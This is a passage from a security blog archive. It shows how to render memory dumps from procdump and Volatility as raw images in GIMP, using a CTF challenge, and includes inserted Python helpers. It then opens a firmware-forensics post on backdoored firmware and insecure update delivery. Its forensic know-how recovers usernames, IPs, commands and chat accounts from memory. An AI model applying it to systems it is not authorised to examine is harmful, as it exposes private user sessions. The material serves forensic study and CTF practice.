Let's load/save a simple image file on Paint and run procdump again:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg_s2LI_WdwDOm9MMlYSSBisY5z9cZOy6OmNZwQXC0awZZm-XfoFPi3NKj_a4ufK2oN8PIUHmZLV3MnUokhyphenhyphen-4ADMGz9qiXzLxOTmRQdZErQ-i1rsWzxxkhRLPb8HzK8e3_XONAB_kP52j/s1600/paint1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg_s2LI_WdwDOm9MMlYSSBisY5z9cZOy6OmNZwQXC0awZZm-XfoFPi3NKj_a4ufK2oN8PIUHmZLV3MnUokhyphenhyphen-4ADMGz9qiXzLxOTmRQdZErQ-i1rsWzxxkhRLPb8HzK8e3_XONAB_kP52j/s1600/paint1.PNG" height="280" width="320" /></a></div>
<br />
<div class="code">
procdump.exe -ma mspaint.exe mspaint.dmp</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-_vEp3r2zVyxXopbguXFn_I8iLyxHHZi0H-23zKoRufeNiUKqfV6xJH3tBEPlL1CgeWrwd2cdud8Ribp2sY5VOojOkorGL1sWm952RUS7PLDANREe0zJWdx-dUtKAk1JUA3Jb9dHygLpb/s1600/mspaint2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-_vEp3r2zVyxXopbguXFn_I8iLyxHHZi0H-23zKoRufeNiUKqfV6xJH3tBEPlL1CgeWrwd2cdud8Ribp2sY5VOojOkorGL1sWm952RUS7PLDANREe0zJWdx-dUtKAk1JUA3Jb9dHygLpb/s1600/mspaint2.PNG" height="201" width="400" /></a></div>
<br />
<br />
<b>9447 2014 CTF Challenge: coor coor - Windows XP (VirtualBox.exe)</b><br />
<div>
There's an <a href="https://twitter.com/jstnkndy/status/541104077086928898">awesome write-up</a> for this CTF challenge <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">here</a>, go read it now if you haven't yet. We are going to use volatility to list the processes and dump only the VirtualBox process memory:</div>
<div>
<br /></div>
<div>
<div class="code">
python vol.py -f challenge.vmem pslist</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZEhlaisCNtKzSxsVCvuNdWR6ORSjlZugsjArIQk-DhZ6jetG0oKpKsdslkqV1UO1RFUNCs0atr6GOEXbZrm9qXlsQzoBPQfHrQlZJjpBJVgjk8wxR0xlev1WmWK2bQduRTW5C-lafilKL/s1600/001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZEhlaisCNtKzSxsVCvuNdWR6ORSjlZugsjArIQk-DhZ6jetG0oKpKsdslkqV1UO1RFUNCs0atr6GOEXbZrm9qXlsQzoBPQfHrQlZJjpBJVgjk8wxR0xlev1WmWK2bQduRTW5C-lafilKL/s1600/001.png" height="268" width="400" /></a></div>
<br />
<div class="code">
python vol.py -f challenge.vmem memdump -p 1568 --dump-dir=dump/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhduE964vwggWaB1tbvggjHwaDM25KBYbDlOgZjSwUvqzPIQuOaqm_5u0WEhwyjcvh2Lz_yir1ZIuPa8Dd3VGPQ36UTOl3yVK73ZsfZ3EAFLaAA-adf5z_UTRO1-sOwRyd5c-ExhxKYJWxC/s1600/002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhduE964vwggWaB1tbvggjHwaDM25KBYbDlOgZjSwUvqzPIQuOaqm_5u0WEhwyjcvh2Lz_yir1ZIuPa8Dd3VGPQ36UTOl3yVK73ZsfZ3EAFLaAA-adf5z_UTRO1-sOwRyd5c-ExhxKYJWxC/s1600/002.png" height="78" width="400" /></a></div>
<br />
<br />
<b>RAW Image Data</b><br />
<br />
Rename the file extensions from *.dmp to *.data, download/install <a href="http://www.gimp.org/">GIMP</a> and open them as "RAW Image Data":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGt6ByT9hs1Sy8oMYNyZnBWVHlbpFLSX5ZZyBkOlP4iO61-rtmNbyZTFjB5OYMWuthFXJwuz46sAb0Fh1aN3hnzHY-cW4iRMBzvPPdIZsq0R2mZxYYP4AsZ-tx4Xp4MKbWF8zSeMwLRP6G/s1600/gimp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGt6ByT9hs1Sy8oMYNyZnBWVHlbpFLSX5ZZyBkOlP4iO61-rtmNbyZTFjB5OYMWuthFXJwuz46sAb0Fh1aN3hnzHY-cW4iRMBzvPPdIZsq0R2mZxYYP4AsZ-tx4Xp4MKbWF8zSeMwLRP6G/s1600/gimp1.png" height="201" width="320" /></a></div>
<br />
That's it, now you can use GIMP to navigate within the memory dump and analyse the rendered pixels/bitmaps at their corresponding offsets. Different bitmaps in the same dump use different pixel layouts (e.g. 24-bit RGB vs 32-bit BGRA) and different widths, so you will need to adjust the image type, width and offset until a picture locks into place.<br />
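The same reinterpretation, as an added example that is not part of the original post and is scriptable: take a slice of a dump at a given offset, treat it as rows of `width` pixels in a given layout, and write a binary PPM (P6) that GIMP, ImageMagick or any viewer opens. Pure standard library. The pixel-layout table and the sample buffer are constructed for the example; the `bottom_up` flag is there for the bottom-up DIBs discussed further down.

```python
"""Added example: render raw dump bytes as a bitmap (what GIMP's Raw Image
Data import does), pure stdlib. The sample buffer is CONSTRUCTED."""
import sys

PIXEL_FORMATS = {
    # name: (bytes per pixel, index of R, G, B inside one pixel)
    "RGB":  (3, (0, 1, 2)),
    "BGR":  (3, (2, 1, 0)),
    "RGBA": (4, (0, 1, 2)),
    "BGRA": (4, (2, 1, 0)),   # 32bpp Windows DIBs / GDI surfaces
}


def raw_to_ppm(data: bytes, width: int, offset: int = 0, fmt: str = "BGRA",
               height=None, bottom_up: bool = False) -> bytes:
    """Reinterpret data[offset:] as `width`-pixel rows in layout `fmt` and
    return a P6 PPM. bottom_up=True reverses the rows, which un-flips a
    bottom-up DIB (the usual BMP storage order) that renders upside down."""
    bpp, (ri, gi, bi) = PIXEL_FORMATS[fmt]
    stride = width * bpp
    avail = (len(data) - offset) // stride
    if height is None or height > avail:
        height = avail
    if height <= 0:
        raise ValueError("not enough data for a single row at this width/offset")
    rows = []
    for y in range(height):
        row = data[offset + y * stride: offset + (y + 1) * stride]
        # keep the three colour channels of each pixel, drop alpha/padding
        rows.append(bytes(row[x * bpp + c] for x in range(width) for c in (ri, gi, bi)))
    if bottom_up:
        rows.reverse()
    header = f"P6\n{width} {height}\n255\n".encode()
    return header + b"".join(rows)


def ppm_size(ppm: bytes):
    """Read (width, height) back out of a P6 header, for sanity checks."""
    parts = ppm.split(b"\n", 3)
    w, h = parts[1].split()
    return int(w), int(h)


def make_sample_buffer():
    """CONSTRUCTED stand-in for a dump: 1 KiB of junk followed by a 4x3 BGRA bitmap
    whose red channel is saturated, green grows with x and blue grows with y."""
    junk = bytes(range(256)) * 4
    bgra = b"".join(bytes([y * 80, x * 60, 255, 0]) for y in range(3) for x in range(4))
    return junk + bgra, len(junk)


if __name__ == "__main__":
    # usage: python raw2ppm.py dump.dmp WIDTH OFFSET [FMT] > out.ppm
    path, width, offset = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
    fmt = sys.argv[4] if len(sys.argv) > 4 else "BGRA"
    with open(path, "rb") as f:
        sys.stdout.buffer.write(raw_to_ppm(f.read(), width, offset, fmt))
```

Rendering a whole multi-gigabyte dump this way is slow in pure Python; use it on the region GIMP already pointed you at, or cap `height` to a screenful.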
<br />
So what can we spot here?<br />
<br />
<ul>
<li>On the RDP memory dump, we can retrieve the tiles and windows displayed during the connection, including IPs, usernames and commands:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpP-ruDRCDOWQF76dmGIvs2kY65HlKBwr2wYqL2KOlATwo5MJpvy_aNWT6gcGZwK7BhzJ5WTWSuo9YkiDhzdhNFvDjZsfO_qWf4hF5OQaQ_zC5ZSpT1cPDGdneAvX92o8rWopOQ1Y-hxiU/s1600/Screenshot-Load+Image+from+Raw+Data-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpP-ruDRCDOWQF76dmGIvs2kY65HlKBwr2wYqL2KOlATwo5MJpvy_aNWT6gcGZwK7BhzJ5WTWSuo9YkiDhzdhNFvDjZsfO_qWf4hF5OQaQ_zC5ZSpT1cPDGdneAvX92o8rWopOQ1Y-hxiU/s1600/Screenshot-Load+Image+from+Raw+Data-2.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Windows commands</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR0FPs8Ft-QDmjPxK5z18U8yLjz0f_1daSdvOy93_G5iqPjn59mqKrXm3FrUGoyW_09Ww_G1AfGQI7xkIlS2zCvHcnOZTJ5bBPblNaBWnfmXtPYSC_ufVzq0TpDjuOCdT66mNlbGJfs6z/s1600/Screenshot-Load+Image+from+Raw+Data-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR0FPs8Ft-QDmjPxK5z18U8yLjz0f_1daSdvOy93_G5iqPjn59mqKrXm3FrUGoyW_09Ww_G1AfGQI7xkIlS2zCvHcnOZTJ5bBPblNaBWnfmXtPYSC_ufVzq0TpDjuOCdT66mNlbGJfs6z/s1600/Screenshot-Load+Image+from+Raw+Data-1.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Remote Desktop Client Window</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM71u75NnpHLI1tciywPKawKXDQdpL3ESO-J19x829mzDeXNX0U4h1hVGsSi98H8OV5_-AmqbqM2j2IQayaMEwMfiRqzaDxoDGx63wm1gRe4omiq47u3utrAR1XcZoe8aGwcehG_T9hr1Y/s1600/Screenshot-Load+Image+from+Raw+Data.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM71u75NnpHLI1tciywPKawKXDQdpL3ESO-J19x829mzDeXNX0U4h1hVGsSi98H8OV5_-AmqbqM2j2IQayaMEwMfiRqzaDxoDGx63wm1gRe4omiq47u3utrAR1XcZoe8aGwcehG_T9hr1Y/s1600/Screenshot-Load+Image+from+Raw+Data.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RDP session</td></tr>
</tbody></table>
<div>
<ul>
<li>The Microsoft Paint picture is easily spotted; it appears upside down because Windows DIB/BMP bitmaps are normally stored bottom-up, last scanline first:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSjJrwC2gro6zKTWtWUZ9-Ug2ros0p_HECzPAyC0ptqe0ZsKs8JANT3JMvDPNKhfPo4cKU2ZUG3_7xkvNibVn5Nhudc-uKXl7JU_xfcypUVL9WzHJVMikOoD5S56NnyOsaqKjk3wpTSXg/s1600/mspaint3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSjJrwC2gro6zKTWtWUZ9-Ug2ros0p_HECzPAyC0ptqe0ZsKs8JANT3JMvDPNKhfPo4cKU2ZUG3_7xkvNibVn5Nhudc-uKXl7JU_xfcypUVL9WzHJVMikOoD5S56NnyOsaqKjk3wpTSXg/s1600/mspaint3.PNG" height="260" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">We need upside down backdoors "this big"<br />
<br /></td></tr>
</tbody></table>
</div>
<ul>
<li>The most interesting artifacts came from the <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">Coor Coor dump</a>. The user was running a TrueCrypt container inside VirtualBox, and after some offset adjustment we can see the Pidgin window, the user account (testicool69@yodawg.9447.plumbing) and a few OTR settings:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2jmn7whwMgLZ3ju6tRYf3ypviTYDwiJD2Ratp-gIzykp_KFjyGpFFt-Kg_kxMyl4yn7gpW4CzDaTvAFmxpw2Li5S0glhV3oQDCns6eW1JRFfn6-8PBEg5xLdJILvYcwwB0UsgQrOBl1SV/s1600/Capturar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2jmn7whwMgLZ3ju6tRYf3ypviTYDwiJD2Ratp-gIzykp_KFjyGpFFt-Kg_kxMyl4yn7gpW4CzDaTvAFmxpw2Li5S0glhV3oQDCns6eW1JRFfn6-8PBEg5xLdJILvYcwwB0UsgQrOBl1SV/s1600/Capturar.PNG" height="174" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">While True: width ++ || width--</td></tr>
</tbody></table>
<br />
Notice that the windows are not perfectly aligned here (the width is slightly off), but we can still read the data by zooming in:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3IwARn15E58jP0UDYX1c8vnjNw-XCDxUDPKHmBcAfKOCR57S_N56CvBIfDuUe3lN_rReEs9nePaqnsJJXvGffKmdY5p-PujjfGwmRMdvZR7pbIjibR7lS_-Gm-hkStXpLajlKj5G3cvVS/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3IwARn15E58jP0UDYX1c8vnjNw-XCDxUDPKHmBcAfKOCR57S_N56CvBIfDuUe3lN_rReEs9nePaqnsJJXvGffKmdY5p-PujjfGwmRMdvZR7pbIjibR7lS_-Gm-hkStXpLajlKj5G3cvVS/s1600/2.PNG" height="347" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Enhance pls</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrZ6QhZdtI2nrruDAEJI3cRXHkdpbOgh7I45z0ja7wti4Gfewb_8EgzqNMAzvmpx096z-mPJBGLXTg0dv7-PD0z1qaveUX-Sm1xWT4jRiLpZjOJQRvfOvFKX_pwHb-olflxFKf3n73k3U/s1600/zoom.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrZ6QhZdtI2nrruDAEJI3cRXHkdpbOgh7I45z0ja7wti4Gfewb_8EgzqNMAzvmpx096z-mPJBGLXTg0dv7-PD0z1qaveUX-Sm1xWT4jRiLpZjOJQRvfOvFKX_pwHb-olflxFKf3n73k3U/s1600/zoom.PNG" height="266" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://hsto.org/storage2/b52/91b/ba7/b5291bba7250abd12010644ca848dd75.jpg">Looks like our killer is screwed. YEEAAAH.</a></td></tr>
</tbody></table>
<br />
We can also spot the Window taskbar, just like the volatility <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference%20Gui#screenshot">screenshot plugin</a> showed us on the <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">previous write-up</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEn5BURxFPVXJml5v0kPA-o_YqM7_kolYTD4ob4OAjGEMws2hUmIfDHF9cJiiFga_zBAQWCArV9SGSECq5s4gXg9FB3XAftiQYkUwRXy_eNGZMxl564gRV8c8bxrpgt5Syp4yJ1qCmoHD/s1600/window.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEn5BURxFPVXJml5v0kPA-o_YqM7_kolYTD4ob4OAjGEMws2hUmIfDHF9cJiiFga_zBAQWCArV9SGSECq5s4gXg9FB3XAftiQYkUwRXy_eNGZMxl564gRV8c8bxrpgt5Syp4yJ1qCmoHD/s1600/window.PNG" height="425" width="640" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalYKauMfz_kCDmjFiJxa87FCcw3sL23YfbCEBjhN0Lq2RSrnt3AmKq6Hs1YxvGGFmBTsutbI52o7mYVMA22aa5QsO1ocx_cMcdcVK6bzqTRHV1FwsCuox9jwkVo2EDS_R5VSJQD8rDV6y/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalYKauMfz_kCDmjFiJxa87FCcw3sL23YfbCEBjhN0Lq2RSrnt3AmKq6Hs1YxvGGFmBTsutbI52o7mYVMA22aa5QsO1ocx_cMcdcVK6bzqTRHV1FwsCuox9jwkVo2EDS_R5VSJQD8rDV6y/s1600/session_0.WinSta0.Default.png" height="227" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">python vol.py -f challenge.vmem screenshot -D screenshot/</td></tr>
</tbody></table>
<br />
It's also possible to spot icons from the running programs, like this one from Virtualbox:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj49hjqhBLw6ozl8lqq_C481EDL5XKUVb3bJHHKh2AQ7N1QJ_jXevHxWmWiR_wq1zONk6RiQNS4KFdN9YcVMtDlHOzJ0lWepDUqfYo0zIRdDMfGr7XvHwkJGTgI9puAXm0rwPMtJOmbZYYi/s1600/vbox.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj49hjqhBLw6ozl8lqq_C481EDL5XKUVb3bJHHKh2AQ7N1QJ_jXevHxWmWiR_wq1zONk6RiQNS4KFdN9YcVMtDlHOzJ0lWepDUqfYo0zIRdDMfGr7XvHwkJGTgI9puAXm0rwPMtJOmbZYYi/s1600/vbox.PNG" height="266" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">VirtualBox <a href="http://www.eightforums.com/attachments/virtualization/6578d1339062148t-vbox-ose-windows-xp-vista-7-8-64-bit-virtualbox.png">icon</a></td></tr>
</tbody></table>
<br />
<br />
<b>Conclusion</b><br />
<br />
This technique is very common among ROM hackers as they try to find image patterns inside raw game dumps. Check my <a href="http://w00tsec.blogspot.com/2014/10/hacklu-2014-ctf-write-up-at-gunpoint.html">write-up from Hack.lu 2014 CTF</a> to find more about it. By the way, you can also use <a href="http://www.romhacking.net/utilities/991/">Tile Molester</a> instead of GIMP to browse the RAW data.<br />
<div>
<br /></div>
You may be asking - why not carve the dumps with binwalk and foremost, or extract them with the <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference#dumpfiles">dumpfiles</a> volatility module? Those tools look for file-format headers (magic bytes), and the bitmaps sitting in process memory are bare pixel buffers with no header in front of them, so if you try it yourself you will notice that most of these images are never found.<br />
<br />
As far as I know, there's no off-the-shelf tool to automagically extract them, but it shouldn't be that hard to write a binwalk/volatility plugin for this based on some heuristics. Binwalk, for example, can find <a href="https://github.com/devttys0/binwalk/blob/b131b7cda7d067897901a5a29dc0cdb8ca69efcb/src/binwalk/modules/compression.py">raw deflate/lzma</a> streams by building headers on top of the raw compressed data and writing it back to disk.<br />
<br />
I'm no computer vision expert, but here are a few suggestions:<br />
<br />
<ul>
<li>Set the image width to common display resolutions. The taskbar from the coor coor memory dump could be displayed by setting the width to 1440 pixels (1440x900 is a common screen resolution).</li>
<li>Use common window background/patterns as a template to find interesting sections.</li>
<li>Create a multi-view/side-by-side RAW image browser based on <a href="https://github.com/GNOME/gimp/blob/cd99314572504bcbcbc9b82035e45fcd95d7d9d5/plug-ins/common/file-raw-data.c">GIMP source code</a> (multiple image types, multiple widths etc).</li>
<li>Use Google's artificial brain to <a href="http://www.wired.com/2012/06/google-x-neural-network/">find cat videos</a>.</li>
<li>Get a bigger monitor (yeah, it helps).</li>
</ul>
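The first suggestion, automated, as an added example that is not part of the original post: for the right row width, vertically adjacent pixels are similar, so the mean absolute difference between byte i and byte i + width*bpp drops to a minimum at the true stride (and at its multiples, so the smallest candidate wins ties). Candidates default to common desktop widths, 1440 included; the probe image is constructed, and the "framebuffer is 32bpp" default is an assumption you adjust per dump.

```python
"""Added example: estimate a raw bitmap's row width from a dump slice by
scoring candidate strides. COMMON_WIDTHS and the probe image are CONSTRUCTED."""

COMMON_WIDTHS = [640, 800, 1024, 1280, 1366, 1440, 1600, 1680, 1920, 2560]


def row_diff_score(data: bytes, width: int, bpp: int = 4, sample_rows: int = 64) -> float:
    """Mean |data[i] - data[i + stride]| over up to `sample_rows` rows; lower is better.
    Returns +inf when the slice is too short to hold two rows at this width."""
    stride = width * bpp
    n = min(len(data) - stride, stride * sample_rows)
    if n <= 0:
        return float("inf")
    total = 0
    for i in range(n):
        total += abs(data[i] - data[i + stride])
    return total / n


def guess_width(data: bytes, candidates=None, bpp: int = 4):
    """Return (best_width, {width: score}). Ties go to the smallest width, since a
    correct stride also scores well at 2x, 3x, ... (every other row still matches)."""
    candidates = sorted(candidates or COMMON_WIDTHS)
    scores = {w: row_diff_score(data, w, bpp) for w in candidates}
    best = min(candidates, key=lambda w: scores[w])   # min() keeps the first minimum
    return best, scores


def make_probe_image(width: int = 64, rows: int = 40, bpp: int = 4) -> bytes:
    """CONSTRUCTED probe: every row is the same non-periodic (LCG) byte pattern,
    which is the extreme case of 'vertically adjacent pixels look alike'."""
    seed = 12345
    row = bytearray()
    for _ in range(width * bpp):
        seed = (1103515245 * seed + 12345) & 0x7FFFFFFF
        row.append((seed >> 16) & 0xFF)
    return bytes(row) * rows


if __name__ == "__main__":
    import sys
    # usage: python stride.py dump.dmp OFFSET [BPP]  (scores a 1 MiB window at OFFSET)
    path, offset = sys.argv[1], int(sys.argv[2])
    bpp = int(sys.argv[3]) if len(sys.argv) > 3 else 4
    with open(path, "rb") as f:
        f.seek(offset)
        best, scores = guess_width(f.read(1 << 20), bpp=bpp)
    for w, s in sorted(scores.items(), key=lambda kv: kv[1]):
        print(f"{w:5d}  {s:8.2f}")
    print("best guess:", best)
```

Real framebuffers are noisier than the probe, so look at the whole ranking rather than only the winner; a clear gap between the best score and the rest is the signal that you are sitting on an actual bitmap and not on heap data.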
<br />
I hope you all use these skills wisely, avoiding any kind of superfishal investigation like our Lenovo friends.<br />
<br />
<a href="https://imgur.com/V4zfOZX"><img height="400" src="https://i.imgur.com/V4zfOZX.png" width="640" /></a><br />
<br />
<br />Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br />
<br />
<b>Firmware Forensics: Diffs, Timelines, ELFs and Backdoors</b> (published 2015-02-09, updated 2015-05-04)<br />
<br />
This post covers some common techniques that I use to analyze and reverse firmware images. These techniques are particularly useful to dissect malicious firmwares, spot backdoors and detect unwanted modifications.<br />
<br />
Backdooring and re-flashing firmware images is becoming mainstream: attackers are infecting embedded devices and inserting trojans in order to achieve persistence. Recent articles covered the increasing number of <a href="http://www.net-security.org/malware_news.php?id=2917">trojanized android firmwares</a> and <a href="http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye/">routers that are being permanently modified</a>.<br />
<br />
Attackers with a privileged network position can intercept your update requests and serve forged updates containing malicious firmware. Writing <a href="https://github.com/infobyte/evilgrade">Evilgrade</a> modules for this is really simple, as most vendors keep <a href="http://dnlongen.blogspot.com.br/2014/10/CVE-2014-2718-Asus-RT-MITM.html">failing to deliver updates securely</a>, right <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">ASUS</a>?<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVAqfAxq9i11xwch4_2rLEoiMNZY7fSYfaS2_duBjnX8T947BO6-H4MPn3FevI5TkqWoPyOjjHwzm9cIaK_f8e0tmfSEH2miFfrOmv67AgVG2cXh9PvbIfrCZszkkZPzPbpPPtOpqE0HL/s1600/22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVAqfAxq9i11xwch4_2rLEoiMNZY7fSYfaS2_duBjnX8T947BO6-H4MPn3FevI5TkqWoPyOjjHwzm9cIaK_f8e0tmfSEH2miFfrOmv67AgVG2cXh9PvbIfrCZszkkZPzPbpPPtOpqE0HL/s1600/22.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">All your HTTP packets are belong to us...</td></tr>
</tbody></table>
Older versions of ASUS firmware were vulnerable to MITM attacks (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2718">CVE-2014-2718</a>) because updates were transmitted over HTTP with no integrity or signature check. ASUS silently patched the issue in 3.0.0.4.376+ and is now <a href="https://github.com/RMerl/asuswrt-merlin/blob/042f83715c5951e291a83ce7d967c3372a392a26/release/src/router/rom/webs_scripts/nozip_webs_upgrade.sh#L75-L96">verifying RSA signatures</a> via /sbin/rsasign_check:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC0cQu1acgVo7UTo6YKDgezjhpdsSYNqWMNhEHp9nQYVpSGxVWLxSymHUgSDgLC3IKiqoUK8Q3Bhpx4-oBqBc3oC86RGsCPeueg1Vw67b5pk9Uxxn1XlQBsg4ymmCNP0yu-TdZHgaRte3e/s1600/asus_rsa.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC0cQu1acgVo7UTo6YKDgezjhpdsSYNqWMNhEHp9nQYVpSGxVWLxSymHUgSDgLC3IKiqoUK8Q3Bhpx4-oBqBc3oC86RGsCPeueg1Vw67b5pk9Uxxn1XlQBsg4ymmCNP0yu-TdZHgaRte3e/s1600/asus_rsa.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Valid signature -> nvram_set("rsasign_check", "1")</td></tr>
</tbody></table>
<br />
<b>NoConName 2014 CTF Finals: Vodka</b><br />
<br />
I'll keep my <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">tradition</a> of writing posts based on CTF challenges because <strike>everybody upvotes CTF posts on reddit</strike> it's cool.<br />
<br />
The challenge "<a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">Vodka</a>", from <a href="https://twitter.com/noconname">NoConName 2014</a> CTF Finals was created by <a href="https://twitter.com/MarioVilas">@MarioVilas</a>, who kindly provided the files <a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">here</a> (thanks dude!).<br />
<br />
I did not participate in the CTF finals, but I found the challenge really interesting because there were many different ways to solve it, and together they summarize the actions needed to audit a compromised firmware. In my opinion, the best CTF challenges are the ones that require us to <a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/hotcows-dating">develop/use new techniques</a> and <a href="https://twitter.com/cherepanov74/status/525617612559249408">improve existing tools</a>.<br />
<br />
NoConName 2014 Finals: Vodka<br />
Challenge Category: Forensics<br />
Description: No hints :( just get the flag.
<br />
<br />
